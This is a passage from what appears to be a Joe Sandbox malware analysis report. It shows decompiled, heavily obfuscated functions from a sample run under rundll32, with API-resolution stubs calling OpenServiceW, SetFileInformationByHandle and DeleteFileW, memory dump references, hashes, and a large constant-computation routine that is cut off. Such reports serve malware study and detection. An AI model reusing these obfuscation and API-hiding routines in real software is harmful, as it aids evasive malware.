				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002507A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x0024f662
0x0024f663
0x0024f665
0x0024f668
0x0024f66a
0x0024f66d
0x0024f670
0x0024f673
0x0024f677
0x0024f678
0x0024f67d
0x0024f687
0x0024f693
0x0024f69a
0x0024f6a1
0x0024f6a5
0x0024f6a9
0x0024f6b0
0x0024f6c9
0x0024f6d8
0x0024f6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0024F6D8

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 734ab44cd992f2a84b361ecf90ffb5bf997b8202504bb139d782407486199198
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: CC01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90466250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0024B6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0024B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0024602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002507A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x0024b6f3
0x0024b6f8
0x0024b702
0x0024b70b
0x0024b712
0x0024b719
0x0024b720
0x0024b727
0x0024b72e
0x0024b747
0x0024b759
0x0024b75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0024B759

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: c757ade2f88ba2662d3f67edc083fcb31f26e0c1be5662b87ba0d73f9a050897
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: F1018FB194030CFBEF45DF90DD06E9E7BB5EF08704F108188FA0526190D3B15E209B51

Uniqueness

Uniqueness Score: -1.00%

Function 0025AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0025AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0024602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002507A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0025aa3f
0x0025aa40
0x0025aa41
0x0025aa44
0x0025aa47
0x0025aa4b
0x0025aa4c
0x0025aa51
0x0025aa5b
0x0025aa64
0x0025aa68
0x0025aa6f
0x0025aa76
0x0025aa8d
0x0025aa90
0x0025aa9d
0x0025aaa8
0x0025aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0025AAA8

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 647ffb927a8bba167ed28c8484d0523fe10928a11d52fb189364724a1cd49019
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: 43F069B191020CFFDF08DF94DD4A89EBFB4EB45304F108088F805A6250D3B29F649B50

Uniqueness

Uniqueness Score: -1.00%

Function 1000745A, Relevance: 1.5, APIs: 1, Instructions: 6
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 25%

			E1000745A() {
				void* _t1;
				void* _t2;
				void* _t3;
				void* _t4;
				void* _t7;

				_push(1);
				_push(0);
				_push(0); // executed
				_t1 = E10007592(_t2, _t3, _t4, _t7); // executed
				return _t1;
			}

0x1000745a
0x1000745c
0x1000745e
0x10007460
0x10007468

APIs

_doexit.LIBCMT ref: 10007460

Part of subcall function 10007592: __lock.LIBCMT ref: 100075A0
Part of subcall function 10007592: DecodePointer.KERNEL32(10010D48,0000001C,10007509,1000E4A0,00000001,00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D), ref: 100075DF
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 100075F0
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007609
Part of subcall function 10007592: DecodePointer.KERNEL32(-00000004,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007619
Part of subcall function 10007592: EncodePointer.KERNEL32(00000000,?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 1000761F
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007635
Part of subcall function 10007592: DecodePointer.KERNEL32(?,10007459,000000FF,?,100091CE,00000011,10004803,?,10006150,0000000D,10010BA0,00000008), ref: 10007640
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007668
Part of subcall function 10007592: __initterm.LIBCMT ref: 10007679

Memory Dump Source

Source File: 00000007.00000002.2109745259.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2109727549.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109828341.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2109839027.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2109852772.0000000010015000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID: Pointer$Decode$Encode__initterm$__lock_doexit
String ID:
API String ID: 3712619029-0
Opcode ID: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction ID: 3ec830fb80d18a678ff5eda6f0b3b9b2a61aba64271b485974690d1bc54d2aa8
Opcode Fuzzy Hash: 95a928402f26c3ad262c23712d694438543e680d10ba6aca6599be447fc1c0b7
Instruction Fuzzy Hash: 5EA00269FD470071F86095502C43F9421017764F42FD44050BB0D2C1C5F4DE62584157

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00249FDC, Relevance: 39.5, Strings: 31, Instructions: 734
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00249FDC(void* __edx) {
				void* __edi;
				signed int _t751;
				void* _t787;
				signed char** _t788;
				signed char** _t790;
				signed char** _t793;
				signed char** _t799;
				short _t803;
				signed int _t804;
				signed int _t805;
				void* _t806;
				signed int _t809;
				signed int _t817;
				signed int _t820;
				signed int _t832;
				signed int _t836;
				signed int _t903;
				intOrPtr* _t917;
				short* _t918;
				short* _t919;
				signed int _t920;
				signed int _t921;
				signed int _t922;
				signed int _t923;
				signed int _t924;
				signed int _t925;
				signed int _t926;
				signed int _t927;
				signed int _t928;
				signed int _t929;
				signed int _t930;
				signed int _t931;
				signed int _t932;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t945;
				signed int _t946;
				signed int _t948;
				void* _t949;
				void* _t950;
				void* _t951;
				void* _t954;
				void* _t955;

				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_t917 =  *((intOrPtr*)(_t949 + 0xc7c));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(_t917);
				_push( *((intOrPtr*)(_t949 + 0xc84)));
				_push(__edx);
				_push(1);
				E0024602B(1);
				 *((intOrPtr*)(_t949 + 0x17c)) = 0x6a586e;
				_t950 = _t949 + 0x1c;
				 *((intOrPtr*)(_t950 + 0x164)) = 0x4d85c8;
				_t946 = 0;
				 *(_t950 + 0x16c) =  *(_t950 + 0x16c) & 0;
				 *((intOrPtr*)(_t950 + 0x168)) = 0x46238e;
				_t806 = 0x2ca20b85;
				 *(_t950 + 0x9c) = 0xada2;
				 *(_t950 + 0x9c) =  *(_t950 + 0x9c) + 0xd9a3;
				_t920 = 0x73;
				 *(_t950 + 0xa0) =  *(_t950 + 0x9c) / _t920;
				 *(_t950 + 0xa0) =  *(_t950 + 0xa0) ^ 0x0000429d;
				 *(_t950 + 0x98) = 0x829e;
				_t921 = 0x5b;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) / _t921;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) | 0x5cf90483;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x5cf976e6;
				 *(_t950 + 0x7c) = 0xdccb;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) | 0xedfbfbdf;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0xedfbcdea;
				 *(_t950 + 0xb4) = 0xef7d;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0xffff7351;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) + 0x45;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0000234d;
				 *(_t950 + 0xe8) = 0xccb1;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) + 0x3b3d;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x0001006d;
				 *(_t950 + 0x74) = 0xc511;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) >> 4;
				_t922 = 0x69;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) / _t922;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0x0000383c;
				 *(_t950 + 0xa4) = 0x943d;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xad44;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) >> 2;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00004163;
				 *(_t950 + 0x114) = 0x676a;
				_t923 = 0xb;
				 *(_t950 + 0x130) = 0;
				 *(_t950 + 0x110) =  *(_t950 + 0x114) / _t923;
				 *(_t950 + 0x110) =  *(_t950 + 0x110) ^ 0x00005b51;
				 *(_t950 + 0x4c) = 0x9f6f;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) << 0xe;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) + 0x7984;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) | 0x0af96bf2;
				 *(_t950 + 0x4c) =  *(_t950 + 0x4c) ^ 0x2ffd6a7e;
				 *(_t950 + 0x44) = 0xfa80;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) * 0x6e;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) << 1;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x35d1b322;
				 *(_t950 + 0xec) = 0x5cda;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) << 5;
				 *(_t950 + 0xec) =  *(_t950 + 0xec) ^ 0x000ba47c;
				 *(_t950 + 0x2c) = 0x6ba5;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) >> 1;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) << 0xe;
				 *(_t950 + 0x2c) =  *(_t950 + 0x2c) ^ 0x1ae9281a;
				 *(_t950 + 0xb4) = 0xc1db;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 0xa;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) << 9;
				 *(_t950 + 0xb4) =  *(_t950 + 0xb4) ^ 0x0ed84dc8;
				 *(_t950 + 0xf0) = 0xa853;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) + 0x8705;
				 *(_t950 + 0xf0) =  *(_t950 + 0xf0) ^ 0x00017aa3;
				 *(_t950 + 0xe8) = 0x787f;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) >> 3;
				 *(_t950 + 0xe8) =  *(_t950 + 0xe8) ^ 0x00000848;
				 *(_t950 + 0xa8) = 0xf94e;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) | 0x6bab1057;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) >> 3;
				 *(_t950 + 0xa8) =  *(_t950 + 0xa8) ^ 0x0d7537b0;
				 *(_t950 + 0x118) = 0x6b15;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) + 0xcaa9;
				 *(_t950 + 0x118) =  *(_t950 + 0x118) ^ 0x0001740a;
				 *(_t950 + 0x10c) = 0x9660;
				_t804 = 0x3f;
				_t924 = 0x1c;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) * 0xe;
				 *(_t950 + 0x10c) =  *(_t950 + 0x10c) ^ 0x00084bb7;
				 *(_t950 + 0x8c) = 0x9ebc;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) >> 8;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) << 7;
				 *(_t950 + 0x8c) =  *(_t950 + 0x8c) ^ 0x00000420;
				 *(_t950 + 0x124) = 0x986;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) * 0x7d;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x0004cea0;
				 *(_t950 + 0x84) = 0x3532;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) / _t804;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) | 0x9ebb0f6f;
				 *(_t950 + 0x84) =  *(_t950 + 0x84) ^ 0x9ebb511f;
				 *(_t950 + 0xa4) = 0x41f;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) * 5;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) + 0xc752;
				 *(_t950 + 0xa4) =  *(_t950 + 0xa4) ^ 0x00008c7a;
				 *(_t950 + 0x108) = 0x3cbe;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) >> 0xb;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00006997;
				 *(_t950 + 0x68) = 0xe725;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) + 0xffffecd7;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x001a364c;
				 *(_t950 + 0xb8) = 0xbf58;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) + 0xf62e;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) | 0xa3709140;
				 *(_t950 + 0xb8) =  *(_t950 + 0xb8) ^ 0xa3719bce;
				 *(_t950 + 0x100) = 0xd5da;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) + 0xa0be;
				 *(_t950 + 0x100) =  *(_t950 + 0x100) ^ 0x000119e9;
				 *(_t950 + 0x54) = 0x395a;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) << 0xb;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x65ad419f;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) + 0xffff95a8;
				 *(_t950 + 0x54) =  *(_t950 + 0x54) ^ 0x64673eb6;
				 *(_t950 + 0xd4) = 0x77ed;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) / _t924;
				 *(_t950 + 0xd4) =  *(_t950 + 0xd4) ^ 0x00006bf4;
				 *(_t950 + 0x114) = 0x68ca;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) << 5;
				 *(_t950 + 0x114) =  *(_t950 + 0x114) ^ 0x000d4b7f;
				 *(_t950 + 0xdc) = 0x2f2e;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) << 7;
				 *(_t950 + 0xdc) =  *(_t950 + 0xdc) ^ 0x0017b89d;
				 *(_t950 + 0x24) = 0x5bdf;
				_t925 = 0xa;
				 *(_t950 + 0x28) =  *(_t950 + 0x24) / _t925;
				_t926 = 0x47;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x43;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) >> 0xf;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x000071e1;
				 *(_t950 + 0x40) = 0xbbeb;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) + 0xd8ab;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) << 3;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0x75fd3d75;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) ^ 0x75fd8dbb;
				 *(_t950 + 0xb0) = 0x7d23;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) >> 6;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) | 0xd94c1b0d;
				 *(_t950 + 0xb0) =  *(_t950 + 0xb0) ^ 0xd94c252c;
				 *(_t950 + 0x60) = 0xae03;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) << 6;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) + 0x7f22;
				 *(_t950 + 0x60) =  *(_t950 + 0x60) ^ 0x002b81ed;
				 *(_t950 + 0xe4) = 0xc6a2;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) + 0x25fd;
				 *(_t950 + 0xe4) =  *(_t950 + 0xe4) ^ 0x0000ec93;
				 *(_t950 + 0x5c) = 0xaf00;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) / _t926;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x47fef2c1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) >> 1;
				 *(_t950 + 0x5c) =  *(_t950 + 0x5c) ^ 0x23ff7799;
				 *(_t950 + 0x24) = 0xf54a;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) | 0x369a6272;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) >> 8;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x5776ac87;
				 *(_t950 + 0x24) =  *(_t950 + 0x24) ^ 0x57402b8a;
				 *(_t950 + 0x124) = 0xcc46;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6df670;
				 *(_t950 + 0x124) =  *(_t950 + 0x124) ^ 0x6d6d578c;
				 *(_t950 + 0x12c) = 0x5a4b;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6f91;
				 *(_t950 + 0x12c) =  *(_t950 + 0x12c) ^ 0xba0c6ca3;
				 *(_t950 + 0x34) = 0x6135;
				_t927 = 0xf;
				 *(_t950 + 0x30) =  *(_t950 + 0x34) / _t927;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) + 0x3b37;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) >> 7;
				 *(_t950 + 0x30) =  *(_t950 + 0x30) ^ 0x0000396d;
				 *(_t950 + 0xfc) = 0x664c;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) * 0x2d;
				 *(_t950 + 0xfc) =  *(_t950 + 0xfc) ^ 0x0011c86c;
				 *(_t950 + 0x7c) = 0x54c3;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) >> 0xa;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) << 6;
				 *(_t950 + 0x7c) =  *(_t950 + 0x7c) ^ 0x00004b81;
				 *(_t950 + 0x28) = 0x1122;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
